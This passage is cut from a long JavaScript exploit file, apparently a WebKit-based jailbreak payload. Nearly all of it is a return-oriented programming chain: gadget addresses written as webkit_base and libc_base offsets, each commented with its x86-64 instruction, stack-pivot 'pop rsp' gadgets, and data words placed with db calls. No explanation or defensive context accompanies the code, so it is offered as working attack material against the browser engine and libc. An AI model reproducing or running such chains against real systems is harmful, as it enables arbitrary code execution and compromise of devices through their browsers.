webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3529:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3530:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3531:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+208240, //L3533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+208288, //L3536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+208256, //L3534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3533:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3534:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3535:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3536:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+208400, //L3537+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+208392, //L3537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3537:
db([0, 0]); // 0x0
set_gadgets([
ropchain+208416, //L3537+24
ropchain+210360, //L3532
libc_base+764760, //pop rsi
ropchain+208456, //L3538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3538:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3540:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+208576, //L3543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208560, //L3541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3541:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3543:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+208720, //L3546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208688, //L3544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+208704, //L3545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3544:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3545:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3546:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+208800, //L3547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3547:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3549:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+208920, //L3552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208904, //L3550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3550:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3552:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+209064, //L3555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209032, //L3553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+209048, //L3554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3553:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3554:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3555:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+209152, //L3557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3556:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3557:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+209208, //L3558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3558:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3560:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+209288, //L3562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3562:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+209400, //L3563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3563:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3565:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+209520, //L3568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209504, //L3566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3566:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3568:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+209664, //L3571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209632, //L3569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+209648, //L3570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3569:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3570:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3571:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+209744, //L3572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3572:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3573:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L3574:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+209872, //L3576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+209856, //L3575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3575:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3576:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+209952, //L3577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3577:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3579:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+210072, //L3582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+210056, //L3580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3580:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3582:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+210152, //L3584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+210184, //L3586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3584:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L3585:
ropchain+210312, //L3583
libc_base+144605 //pop rdi
]);
//L3586:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+210288, //L3588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+210304, //L3587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3588:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3587:
db([0, 0]); // 0x0
//L3583:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+210376, //L3589
//L3532:
libc_base+782311, //pop rsp
ropchain+210392, //L3590
//L3589:
libc_base+782311, //pop rsp
ropchain+206592, //L3494
//L3590:
//L3488:
libc_base+764760, //pop rsi
ropchain+210432, //L3591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3591:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3593:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+210552, //L3596
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+210536, //L3594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3594:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3596:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+210664, //L3597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+210696, //L3599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+210680, //L3598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3597:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3598:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3599:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+210800, //L3600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+210816, //L3601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3600:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3601:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+210936, //L3602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+210920, //L3603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3603:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3602:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+211024, //L3605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+211008, //L3604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3604:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3605:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+211128, //L3606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+211144, //L3607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3606:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3607:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+211264, //L3608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+211248, //L3609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3609:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3608:
db([0, 0]); // 0x0
//__ntoa_format:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+211336, //L3611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L3611:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+211432, //L3612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+211464, //L3615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L3612:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3614:
db([96, 0]); // 0x60
set_gadget(webkit_base+568675,); //pop r8
//L3615:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+211568, //L3618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+211552, //L3616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3616:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3618:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+211744, //L3621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+211760, //L3622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+211712, //L3619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+211728, //L3620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3619:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3620:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3621:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3622:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+211856, //L3624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+211840, //L3623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3623:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3624:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3625:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3626:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L3627:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+212056, //L3629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3629:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+212112, //L3630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3630:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+212248, //L3634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+212232, //L3633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3632:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3633:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3634:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+212368, //L3637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+212336, //L3635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3635:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3636:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3637:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+212504, //L3639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+212520, //L3640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+212488, //L3638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3638:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3639:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3640:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+212632, //L3642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+212680, //L3645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+212648, //L3643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3643:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3644:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3645:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+212792, //L3646+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+212784, //L3646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3646:
db([0, 0]); // 0x0
set_gadgets([
ropchain+212808, //L3646+24
ropchain+230352, //L3641
libc_base+764760, //pop rsi
ropchain+212848, //L3647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3647:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3649:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+212968, //L3652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+212952, //L3650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3650:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3652:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+213144, //L3655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+213160, //L3656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+213112, //L3653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+213128, //L3654
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3653:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3654:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3655:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3656:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+213320, //L3660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+213288, //L3658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+213304, //L3659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3657:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3658:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3659:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3660:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+213424, //L3663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+213456, //L3665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3662:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3663:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3664:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3665:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+213568, //L3666+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+213560, //L3666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3666:
db([0, 0]); // 0x0
set_gadgets([
ropchain+213584, //L3666+24
ropchain+214624, //L3661
libc_base+764760, //pop rsi
ropchain+213624, //L3667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3667:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3669:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+213744, //L3672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+213728, //L3670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3670:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3672:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+213920, //L3675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+213936, //L3676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+213888, //L3673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+213904, //L3674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3673:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3674:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3675:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3676:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+214032, //L3678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+214016, //L3677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3677:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3678:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
